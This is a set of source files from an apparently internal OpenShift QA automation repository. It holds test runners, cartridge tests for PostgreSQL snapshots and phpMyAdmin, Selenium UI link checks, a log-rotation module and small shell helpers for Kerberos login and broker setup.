\"xxx\"\n tags_to_skip = map(lambda x: x.strip(),options.skip_tags.split(','))\n log.debug(\"TAGS to skip:%s\"%tags_to_skip)\n skip_tag_ids = tcmsobj.get_tag_id(tags_to_skip)\n\n\n # Priority for TCMS Arguments: -i -> -t\n # Priority for test case filter arguments: -c -> -g\n if options.testrun_id != None:\n # This branch is when you want to use existing test run\n test_run_id = options.testrun_id\n if not options.FROM_DB:\n log.info(\"Using existing TCMS Test Run - https://tcms.engineering.redhat.com/run/%s/\" %(test_run_id))\n else:\n log.info(\"Not talking with TCMS...using MySQL db instead...\")\n \n if len(tc_id_list) != 0:\n r = run_tests(test_run_id, tc_id_list, skip_tag_ids=skip_tag_ids)\n elif len(tc_tag_list) != 0:\n if not options.FROM_DB:\n tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_list, testplan_id)\n else:\n params = {'is_automated': 1, 'case_status': 'CONFIRMED'}\n tc_id_list = database.get_testcase_ids_by_tag(tc_tag_list, params)\n r = run_tests(test_run_id, tc_id_list, skip_tag_ids=skip_tag_ids)\n else:\n r = run_tests(test_run_id, skip_tag_ids=skip_tag_ids)\n elif options.testrun_tag != None:\n # This branch is when you want to create a new test run\n if len(tc_id_list) != 0:\n test_run_id = create_test_run(options.testrun_tag, tc_id_list, testplan_id)\n r = run_tests(test_run_id, skip_tag_ids=skip_tag_ids)\n elif len(tc_tag_list) != 0:\n if options.FROM_DB:\n # get tc_id_list from DB\n params = {'is_automated': 1, 'case_status': 'CONFIRMED'}\n # 1. create a testrun into row mysql db\n testrun_res = database.create_tcms_testrun()\n # 2. get test list from db\n tc_id_list = database.get_testcase_ids_by_tag(tc_tag_list, params)\n # 3. create testcase_run entries into db_res\n tc_run_id_list = []\n for tc_id in tc_id_list:\n params = {'run': testrun_res.id, 'case_id': tc_id }\n res = database.create_tcms_testcase_run(params)\n tc_run_id_list.append(res.id) \n\n # 4. update test_run db entry with the testcase list\n test_run_id = testrun_res.id \n testrun_res.case_list = str(tc_run_id_list)\n else:\n tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_list, testplan_id)\n test_run_id = create_test_run(options.testrun_tag, tc_id_list, testplan_id)\n r = run_tests(test_run_id, tc_id_list, skip_tag_ids=skip_tag_ids)\n else:\n print usage\n raise Exception(\"Entry test case id list using option '-c' or test case tag list using option '-g'\")\n else:\n print usage\n raise Exception(\"Enter existing TCMS test run id using option '-i' or create new TCMS test run using option '-t'\")\n\n # Clean up everything under workspace/\n # we don't wanna clean it, because of later debugging \n #os.system(\"rm -rf %s/../workspace/*\" % (file_path))\n\n return r\n\n\ndef debug(msg):\n print >> sys.stderr, msg\n\nif __name__ == \"__main__\":\n exit_code=main()\n sys.exit(exit_code)\n" }, { "alpha_fraction": 0.5449438095092773, "alphanum_fraction": 0.5786516666412354, "avg_line_length": 16.799999237060547, "blob_id": "e73a3b731abf043ac52950fac7e4e2fd153f21e6", "content_id": "4ced89a8e6d4e510f55a22f6ea207d5d6d8935ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 178, "license_type": "no_license", "max_line_length": 73, "num_lines": 10, "path": "/automation/open/testmodules/RT/cartridge/app_template/php_pear.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n\ninclude \"Validate.php\";\n\nif (Validate::number(8.0004, array('decimal' => '.', 'dec_prec' => 4))) {\n echo 'get_correct_number';\n} else {\n echo \"Invalid number\";\n}\n?>\n" }, { "alpha_fraction": 0.6676557660102844, "alphanum_fraction": 0.6706231236457825, "avg_line_length": 24.923076629638672, "blob_id": "4bea3a6a5ba6790312fca9a50f4ff652d9757a5c", "content_id": "bbe506cfefdbe01a73cb1f40f1c76d463bb74f1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 337, "license_type": "no_license", "max_line_length": 63, "num_lines": 13, "path": "/automation/open/bin/kinit.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n#\n# Variables below might be obtained from Jenkins job parameters\n#\nif [ -f $RHTEST_HOME/bin/kinit.expect ]; then\n $RHTEST_HOME/bin/kinit.expect \"$TCMS_USER\" \"$TCMS_PASSWORD\"\nelif [ -f ./kinit.expect ]; then \n ./kinit.expect \"$TCMS_USER\" \"$TCMS_PASSWORD\"\nelse\n echo \"Unable to find 'kinit.expect' file\"\n exit 3\nfi\n" }, { "alpha_fraction": 0.6913357377052307, "alphanum_fraction": 0.7129963636398315, "avg_line_length": 19.518518447875977, "blob_id": "c8b38e8cfaeeb6a129a6709f9a0460b5a2f1e319", "content_id": "d7230dc7b45a36c7b15627a9a31ea74e28b65bc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 554, "license_type": "no_license", "max_line_length": 67, "num_lines": 27, "path": "/automation/open/bin/setup_cloud9_env.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n#\n# Generated from https://hosted.englab.nay.redhat.com/issues/11904\n#\n# [email protected]\n#\n\nset -e\n\nif [ -z \"$2\" ]; then\n echo \"Usage: $0 <Broker IP> <Openshift login>\"\n exit 2\nfi\n\nBROKER=$1\nLOGIN=$2\n\nssh root@$BROKER<<EOF\ncd /etc/openshift\nrm -f resource_limits.conf\nln -s resource_limits.conf.c9 resource_limits.conf\n/usr/libexec/mcollective/update_yaml.rb /etc/mcollective/facts.yaml\nrhc-admin-ctl-user -l $LOGIN --allowsubaccounts true\nrhc-admin-ctl-user -l $LOGIN --addgearsize c9\nrhc-admin-ctl-user -l $LOGIN --inheritgearsize true\nEOF\n" }, { "alpha_fraction": 0.5008310079574585, "alphanum_fraction": 0.5098799467086792, "avg_line_length": 40.33587646484375, "blob_id": "cdc75bddad6feda4fd9d42fb33d4f67c2038a2b7", "content_id": "5c55a1e1243d76fe196fc910748c0f7dc597e6ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5415, "license_type": "no_license", "max_line_length": 204, "num_lines": 131, "path": "/automation/open/testmodules/RT/cartridge/postgresql_snapshot_existing_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nJun 25, 2012\n\n[US1386][Runtime][cartridge]Snapshot and restore PostgreSQL data to existing app\nhttps://tcms.engineering.redhat.com/case/128840/\n\"\"\"\n\nimport os\nimport rhtest\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing self.config.test_variant, using `php` as default\")\n self.test_variant='jbossews'\n\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(7)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n common.env_setup()\n self.summary = \"[US1386][Runtime][cartridge]Snapshot and restore PostgreSQL data to existing app\"\n \n\n def finalize(self):\n #Removing snapshot file\n os.remove(\"./\" + self.app_name + \".tar.gz\")\n \n def run_sql(self, sql_commands = []):\n command = 'echo \"%s\" | psql -F, -t -A \"dbname=%s host=%s user=%s password=%s port=%s\"' % (\n \";\\n\".join(sql_commands),\n self.sql_credentials[\"database\"],\n self.sql_credentials[\"url\"],\n self.sql_credentials[\"username\"],\n self.sql_credentials[\"password\"],\n self.sql_credentials[\"port\"] \n )\n return common.run_remote_cmd(self.app_name, command)\n\nclass PostgresqlSnapshotExistingApp(OpenShiftTest):\n \n def test_method(self):\n self.info(\"=================================\")\n self.info(\"1. Create an application\")\n self.info(\"=================================\")\n if self.scalable:\n ret = common.create_scalable_app(self.app_name,\n self.app_type,\n clone_repo = True,\n disable_autoscaling=True)\n else:\n ret = common.create_app(self.app_name,\n self.app_type,\n clone_repo = True)\n self.assert_equal(0, ret, \"Error creating app.\")\n \n self.info(\"=================================\")\n self.info(\"2. Embed PostgreSQL\")\n self.info(\"=================================\")\n common.embed(self.app_name, \"add-\" + common.cartridge_types[\"postgresql\"])\n #\n # Reading PostgreSQL credentials from local cache\n #\n user = OSConf.OSConf()\n user.load_conf()\n\t\n #self.sql_credentials = user.conf[\"apps\"][self.app_name]['embed'][common.cartridge_types[\"postgresql\"]]\n #print user.conf[\"apps\"][self.app_name]['embed']\n self.sql_credentials = user.conf[\"apps\"][self.app_name]['embed'][\"postgresql-8.4\"]\n\t\n self.info(\"=================================\")\n self.info(\"3. Write data into PostgreSQL\")\n self.info(\"=================================\")\n sql_commands = [\n \"DROP TABLE IF EXISTS testing\",\n \"CREATE TABLE testing ( text VARCHAR(50) )\"\n ]\n for i in range(0, 10):\n sql_commands.append(\"INSERT INTO testing VALUES ( '%s' )\" % common.getRandomString())\n self.assert_true(self.run_sql(sql_commands)[0] == 0)\n \n self.info(\"=================================\")\n self.info(\"4. Create snapshot\")\n self.info(\"=================================\")\n common.command_getstatusoutput(\"rhc snapshot save %s -l %s -p '%s' %s\" % ( self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n \n self.info(\"=================================\")\n self.info(\"5. Write additional data into PostgreSQL\")\n self.info(\"=================================\")\n sql_commands = []\n for i in range(0, 10):\n sql_commands.append(\"INSERT INTO testing VALUES ( '%s' )\" % common.getRandomString())\n self.assert_true(self.run_sql(sql_commands)[0] == 0)\n \n self.info(\"=================================\")\n self.info(\"5. Restore from snapshot\")\n self.info(\"=================================\")\n common.command_getstatusoutput(\"rhc snapshot restore %s -l %s -p '%s' %s\" % ( self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n \n self.info(\"=================================\")\n self.info(\"6. Ensure that data is restored\")\n self.info(\"=================================\")\n # It means that there should be only 10 rows in the database\n ( ret_code, ret_output ) = self.run_sql([\"SELECT 'Number of records', count(*) FROM testing\"])\n self.assert_true(ret_output.find(\"Number of records,10\") != -1)\n \n return self.passed(self.summary)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PostgresqlSnapshotExistingApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6504442095756531, "alphanum_fraction": 0.6595210433006287, "avg_line_length": 52.9375, "blob_id": "4114f0bd5174fd78d80344e59339a6ce0ce7359e", "content_id": "547aaaa28e1833cf44d6c2f2c17ef6c3148bd412", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5178, "license_type": "no_license", "max_line_length": 162, "num_lines": 96, "path": "/automation/open/testmodules/RT/cartridge/mysql_admin_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-23\n\n[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\nhttps://tcms.engineering.redhat.com/case/138803/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n self.test_variant = 'php'\n self.summary = \"[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\"\n self.app_name = \"mysqladmin\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = \"./%s\" % (self.app_name)\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass MysqlAdminTest(OpenShiftTest):\n\n def test_method(self):\n # Create app\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"App creation failed\")\n # Try to embed phpmyadmin without mysql embedded\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"phpmyadmin\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_not_equal(ret, 0, \"phpmyadmin shouldn't be embedded before embedding mysql\")\n # Embed mysql to it\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to the app\")\n # Embed phpmyadmin to it\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"phpmyadmin\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed MySQL Admin(phpmyadmin) to the app\")\n # Check phpmyadmin is working properly\n mysql_username = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]]['username']\n mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]]['password']\n phpadmin_url = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"phpmyadmin\"]]['url']\n expected_output = \"phpMyAdmin is more friendly with a <b>frames-capable</b> browser\"\n ret = common.grep_web_page(phpadmin_url, common.raw_str(expected_output), \"-k -H 'Pragma: no-cache' -L -u '%s:%s'\" % (mysql_username, mysql_passwd), 5, 4)\n self.assert_equal(ret, 0, \"phpmyadmin isn't working properly\")\n # Remove embedded mysql from the app\n ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to remove embedded mysql from the app\")\n # Check phpmyadmin isn't removed\n time.sleep(5)\n cmd = \"curl -k -H 'Pragma: no-cache' -L -u '%s:%s' %s\" % (mysql_username, mysql_passwd, phpadmin_url)\n (ret, output) = common.command_getstatusoutput(cmd, quiet=True)\n self.assert_not_match(\"404 Not Found\", output, \"Found '404 Not Found'. phpmyadmin shouldn't be removed\")\n # Check mysql database is inaccessable\n expected_outputs = [common.raw_str(\"phpMyAdmin - Error\"),\n common.raw_str(\"#2003 - Can't connect to MySQL server on\"),\n common.raw_str(\"The server is not responding\")]\n ret = common.grep_web_page(phpadmin_url, expected_outputs, \"-k -H 'Pragma: no-cache' -L -u '%s:%s'\" % (mysql_username, mysql_passwd), 5, 4, True)\n self.assert_equal(ret, 0, \"phpmyadmin shouldn't be working!!!\")\n # Re-embed mysql to the app\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to re-embed mysql\")\n # Check phpmyadmin is working properly again\n mysql_username = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]]['username']\n mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]]['password']\n expected_output = \"phpMyAdmin is more friendly with a <b>frames-capable</b> browser\"\n ret = common.grep_web_page(phpadmin_url, common.raw_str(expected_output), \"-k -H 'Pragma: no-cache' -L -u '%s:%s'\" % (mysql_username, mysql_passwd), 5, 4)\n self.assert_equal(ret, 0, \"phpmyadmin isn't working properly after re-embedding mysql\")\n # The end\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MysqlAdminTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6541768908500671, "alphanum_fraction": 0.6701474189758301, "avg_line_length": 22.919116973876953, "blob_id": "959cc0cf75a48163071a9102811999cf2dbc5288", "content_id": "08150570e31fe2aeb8251fae1a5b4e13340360cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3256, "license_type": "no_license", "max_line_length": 100, "num_lines": 136, "path": "/automation/open/lib/logfile.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nManaging logfile rotation. A ManagedLog object is a file-like object that\nrotates itself when a maximum size is reached.\n\n\"\"\"\nimport sys, os\n\nclass SizeError(IOError):\n\tpass\n\nclass LogFile(file):\n\t\"\"\"LogFile(name, [mode=\"w\"], [maxsize=360000])\n\tOpens a new file object. After writing <maxsize> bytes a SizeError will be\n\traised. \"\"\"\n\tdef __init__(self, name, mode=\"w\", maxsize=360000):\n\t\tsuper(LogFile, self).__init__(name, mode)\n\t\tself.maxsize = maxsize\n\t\tself.written = 0\n\n\tdef write(self, data):\n\t\tself.written += len(data)\n\t\tsuper(LogFile, self).write(data)\n\t\tself.flush()\n\t\tif self.written > self.maxsize:\n\t\t\traise SizeError\n\n\tdef rotate(self):\n\t\treturn rotate(self)\n\n\tdef note(self, text):\n\t\t\"\"\"Writes a specially formated note text to the file.The note starts\nwith the string '\\\\n#*=' so you can easily filter them. \"\"\"\n\t\tself.write(\"\\n#*===== %s =====\\n\" % (text,))\n\n\nclass ManagedLog(object):\n\t\"\"\"ManagedLog(name, [maxsize=360000], [maxsave=9])\n\tA ManagedLog instance is a persistent log object. Write data with the\n\twrite() method. The log size and rotation is handled automatically.\n\n\t\"\"\"\n\tdef __init__(self, name, maxsize=360000, maxsave=9):\n\t\tif os.path.isfile(name):\n\t\t\tshiftlogs(name, maxsave)\n\t\tself._lf = LogFile(name, \"w\", maxsize)\n\t\tself.maxsave = maxsave\n\n\tdef __repr__(self):\n\t\treturn \"%s(%r, %r, %r)\" % (self.__class__.__name__, self._lf.name, self._lf.maxsize, self.maxsave)\n\n\tdef write(self, data):\n\t\ttry:\n\t\t\tself._lf.write(data)\n\t\texcept SizeError:\n\t\t\tself._lf = rotate(self._lf, self.maxsave)\n\t\n\tdef written(self):\n\t\treturn self._lf.written\n\n\tdef rotate(self): \n\t\tself._lf = rotate(self._lf, self.maxsave)\n\t\n\t# auto-delegate remaining methods (but you should not read or seek an open\n\t# log file).\n\tdef __getattr__(self, name):\n\t\treturn getattr(self._lf, name)\n\n\n# useful for logged stdout for daemon processes\nclass ManagedStdio(ManagedLog):\n\tdef write(self, data):\n\t\ttry:\n\t\t\tself._lf.write(data)\n\t\texcept SizeError:\n\t\t\tsys.stdout.flush()\n\t\t\tsys.stderr.flush()\n\t\t\tself._lf = rotate(self._lf, self.maxsave)\n\t\t\tfd = self._lf.fileno()\n\t\t\tos.dup2(fd, 1)\n\t\t\tos.dup2(fd, 2)\n\t\t\tsys.stdout = sys.stderr = self\n\n\ndef rotate(fileobj, maxsave=9):\n\tname = fileobj.name\n\tmode = fileobj.mode\n\tmaxsize = fileobj.maxsize\n\tfileobj.close()\n\tshiftlogs(name, maxsave)\n\treturn LogFile(name, mode, maxsize)\n\n\n# assumes basename logfile is closed.\ndef shiftlogs(basename, maxsave):\n\ttopname = \"%s.%d\" % (basename, maxsave)\n\tif os.path.isfile(topname):\n\t\tos.unlink(topname)\n\n\tfor i in range(maxsave, 0, -1):\n\t\toldname = \"%s.%d\" % (basename, i)\n\t\tnewname = \"%s.%d\" % (basename, i+1)\n\t\ttry:\n\t\t\tos.rename(oldname, newname)\n\t\texcept OSError:\n\t\t\tpass\n\ttry:\n\t\tos.rename(basename, \"%s.1\" % (basename))\n\texcept OSError:\n\t\tpass\n\n\ndef open(name, maxsize=360000, maxsave=9):\n\treturn ManagedLog(name, maxsize, maxsave)\n\ndef writelog(logobj, data):\n\ttry:\n\t\tlogobj.write(data)\n\texcept SizeError:\n\t\treturn rotate(logobj)\n\telse:\n\t\treturn logobj\n\n\ndef _test(argv):\n\tbasename = \"/var/tmp/logfile_test\"\n\tlf = ManagedLog(basename, maxsize=1000)\n\tfor i in xrange(10000):\n\t\tlf.write(\"testing %i (%d) %s\\n\" % (i, lf.written(), string.ascii_letters))\n\tlf.note(\"test note\")\n\tlf.close()\n\nif __name__ == \"__main__\":\n\timport sys, string\n\t_test(sys.argv)\n\n\n\n" }, { "alpha_fraction": 0.542682945728302, "alphanum_fraction": 0.5455523729324341, "avg_line_length": 34.2911376953125, "blob_id": "5a76137490a95896881f947869b29468e6e80cba", "content_id": "f75837232c6e794a4faff363379bb7165495a976", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2788, "license_type": "no_license", "max_line_length": 76, "num_lines": 79, "path": "/automation/runlocal.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport sys\nfrom os.path import join, exists\n\nfrom robot import run\n\nimport hta2\nfrom hta2.core.exceptions import UsageError\nfrom hta2.core.management.base import BaseCommand\nfrom hta2.core.management.paramshandler import ParamsHandler\n\n\nTEMPLATES_PATH = join(hta2.__path__[0], 'template', 'project_template')\nTESTS_PATH = '/home/xin/pydev/HTA2/tests'\n\n\nclass Command(BaseCommand):\n\n def syntax(self):\n return \"[options]\"\n\n def short_desc(self):\n return \"Run project on local environment.\"\n\n def long_desc(self):\n return \"Run project on local environment.\\n \\\n Some options you need type\"\n\n def add_options(self, parser):\n parser.add_option('--notcms', action='store_true', dest='no_tcms',\n help='Whether write result to tcms in real-time. \\\n default is writting.')\n parser.add_option(\"-c\", \"--cases\", dest=\"cases\",\n metavar=\"CASES_PATH\", help=\"Set Cases_PATH\")\n parser.add_option(\"-p\", \"--planid\", dest=\"plan_id\",\n metavar=\"PLAN_ID\", help=\"Set PLAN_ID\")\n parser.add_option(\"-r\", \"--runid\", dest=\"run_id\", default='',\n metavar=\"RUN_ID\", help=\"Set RUN_ID\")\n parser.add_option(\"-o\", \"--output\", dest=\"output_dir\", default='./',\n metavar=\"OUTPUT_DIR\", help=\"Set OUTput_DIR\")\n parser.add_option(\"-t\", \"--tags\", dest=\"case_tags\", action=\"append\",\n default=[], metavar=\"CASE_TAGS\",\n help=\"Select case via CASE_TAG\")\n\n def run(self, args, opts):\n if not opts.cases:\n raise UsageError(\"case path must be set using -c/--cases!\")\n plan_id = opts.plan_id\n run_id = opts.run_id\n log_level = 'DEBUG'\n noncritical = ['noncritical']\n exclude_tag = ['notready']\n cases_path = opts.cases\n listener = 'hta2.core.management.listener.TCMSListener:%s:%s' \\\n % (plan_id, run_id)\n case_tags = opts.case_tags\n output_dir = opts.output_dir\n if not opts.no_tcms:\n if not opts.plan_id:\n raise UsageError(\"plan id must be set using -p/--planid!\")\n run(cases_path,\n loglevel=log_level,\n include=case_tags,\n exclude=exclude_tag,\n noncritical=noncritical,\n outputdir=output_dir,\n listener=listener)\n else:\n run(cases_path,\n loglevel=log_level,\n include=case_tags,\n exclude=exclude_tag,\n noncritical=noncritical,\n outputdir=output_dir)\n\n\nif __name__ == '__main__':\n print 'test'\n" }, { "alpha_fraction": 0.7053701281547546, "alphanum_fraction": 0.7053701281547546, "avg_line_length": 22.758621215820312, "blob_id": "7492c75398e0e4babdf222d37a3b940bbf5f6c43", "content_id": "54be4984a1a30c16ee41ceb2b80556612e1360b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "no_license", "max_line_length": 63, "num_lines": 29, "path": "/automation/open/testmodules/RT/quick_start/quick_start_drupal_zend.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\n# user defined packages\nfrom quick_start_drupal import QuickStartDrupal\n\nclass QuickStartDrupalZend(QuickStartDrupal):\n\n def __init__(self, config):\n QuickStartDrupal.__init__(self, config)\n self.config.application_type = common.app_types[\"zend\"]\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartDrupalZend)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5888210535049438, "alphanum_fraction": 0.6061676740646362, "avg_line_length": 33.19780349731445, "blob_id": "573a28897a78ffbbd826fea7e006252ff115b018", "content_id": "d88302932e5013a042b2b20ea42056a1bc1d2519", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3115, "license_type": "no_license", "max_line_length": 121, "num_lines": 91, "path": "/automation/open/testmodules/UI/web/case_138623.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_138623.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckAppPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n web.create_app(\"python-2.6\",\"python\")\n\n #check wether the links are correct\n time.sleep(20)\n #go to the app details page\n web.go_to_app_detail(\"python\")\n\n #check the \" add an SSH public key to your account\" link\n web.click_element_by_xpath('''//section[@id='app-cartridges']/div/div/div/div/p/a''')\n web.assert_text_equal_by_xpath('''My Account''','''//div[@id='content']/div/div/div/div[2]/div/h1''')\n web.go_back()\n #check the \"Enable Jenkins builds\" link\n web.click_element_by_xpath('''//section[@id='app-cartridges']/div/div/div/div/div[2]/div/a''')\n web.assert_text_equal_by_xpath('''Enable Jenkins Builds''','''//div[@id='content']/div/div/div/div[2]/div/h1''')\n web.go_back()\n #check the \"See the getting started tips for this app →\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul/li/a''')\n web.assert_text_equal_by_xpath('''GET STARTED''','''//div[@id='content']/div/div/div/div/div/nav/ul/li[3]''')\n web.go_back()\n\n #check the \"OpenShift User Guide\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li/a''')\n time.sleep(3)\n web.check_title(\"User Guide - Red Hat Customer Portal\")\n web.go_back()\n #check the \"Sync your OpenShift repo with an existing Git repo\" link\n web.click_element_by_xpath('''//div[@id='assistance']/ul[2]/li[2]/a''')\n web.assert_text_equal_by_xpath('''Knowledge Base''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n web.go_back()\n #check the \"Delete this application\" link\n web.click_element_by_xpath('''//aside[@id='app-unique-info']/div[2]/a''')\n web.assert_text_equal_by_xpath('''Delete Application''','''//div[@id='content']/div/div/div/div[2]/div/h1''')\n web.go_back()\n #check the \"Add Cartridge\" link\n web.click_element_by_xpath('''//section[@id='app-cartridges']/div[2]/a/strong''')\n web.assert_text_equal_by_xpath('''ADD A CARTRIDGE''','''//div[@id='content']/div/div/div/div/div/nav/ul/li[3]''')\n \n #delete a python app\n web.delete_last_app(\"python\")\n\n\n self.tearDown()\n\n return self.passed(\" case_138623--CheckAppGetstartedPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckAppPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_138623.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5390801429748535, "alphanum_fraction": 0.5466197729110718, "avg_line_length": 26.44137954711914, "blob_id": "a55c5de0218aa6fa8426ebe59a5e0e05c0f6ff9d", "content_id": "9c85a47cc7e8de826e0cdc896f691aff4a694300", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3979, "license_type": "no_license", "max_line_length": 85, "num_lines": 145, "path": "/automation/open/lib/supports/nmsgetopt.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nSpecial getopt function. It returns long options as a dictionary. Any\nname-value pair may be given on the command line.\n\n\"\"\"\nimport nmsbuiltins\n\nclass GetoptError(Exception):\n opt = ''\n msg = ''\n def __init__(self, msg, opt):\n self.msg = msg\n self.opt = opt\n Exception.__init__(self, msg, opt)\n\n def __str__(self):\n return self.msg\n\nadd_exception(GetoptError)\n\n#def nmsgetopt(argv):\n# \"\"\"nmsgetopt(argv)\n#Parses the argument list and returns an nms configuration object initialized\n#with command-line arguments. \"\"\"\n# import config\n# try:\n# optlist, extraopts, args = getopt(argv[1:], \"hdvc:f:\")\n# except GetoptError, err:\n# print >>sys.stderr, err\n# sys.exit(2)\n# cf = config.get_config(initdict=extraopts)\n# for opt, optarg in optlist:\n# if opt == \"-h\":\n# print __doc__\n# sys.exit(2)\n# if opt == \"-d\":\n# cf.flags.DEBUG += 1\n# if opt == \"-v\":\n# cf.flags.VERBOSE += 1\n# if opt == \"-c\" or opt == \"-f\":\n# cf.mergefile(optarg)\n# cf.argv = args\n# return cf\n\n\n# special getopt processing for tests. long-form options get placed in\n# a dictionary of name-value pairs.\n\ndef getopt(args, shortopts):\n \"\"\"getopt(args, options) -> opts, long_opts, args \nReturns options as list of tuples, long options as entries in a dictionary, and\nthe remaining arguments.\"\"\"\n opts = []\n longopts = {}\n while args and args[0].startswith('-') and args[0] != '-':\n if args[0] == '--':\n args = args[1:]\n break\n if args[0].startswith('--'):\n arg = args.pop(0)\n _do_longs(longopts, arg)\n else:\n opts, args = _do_shorts(opts, args[0][1:], shortopts, 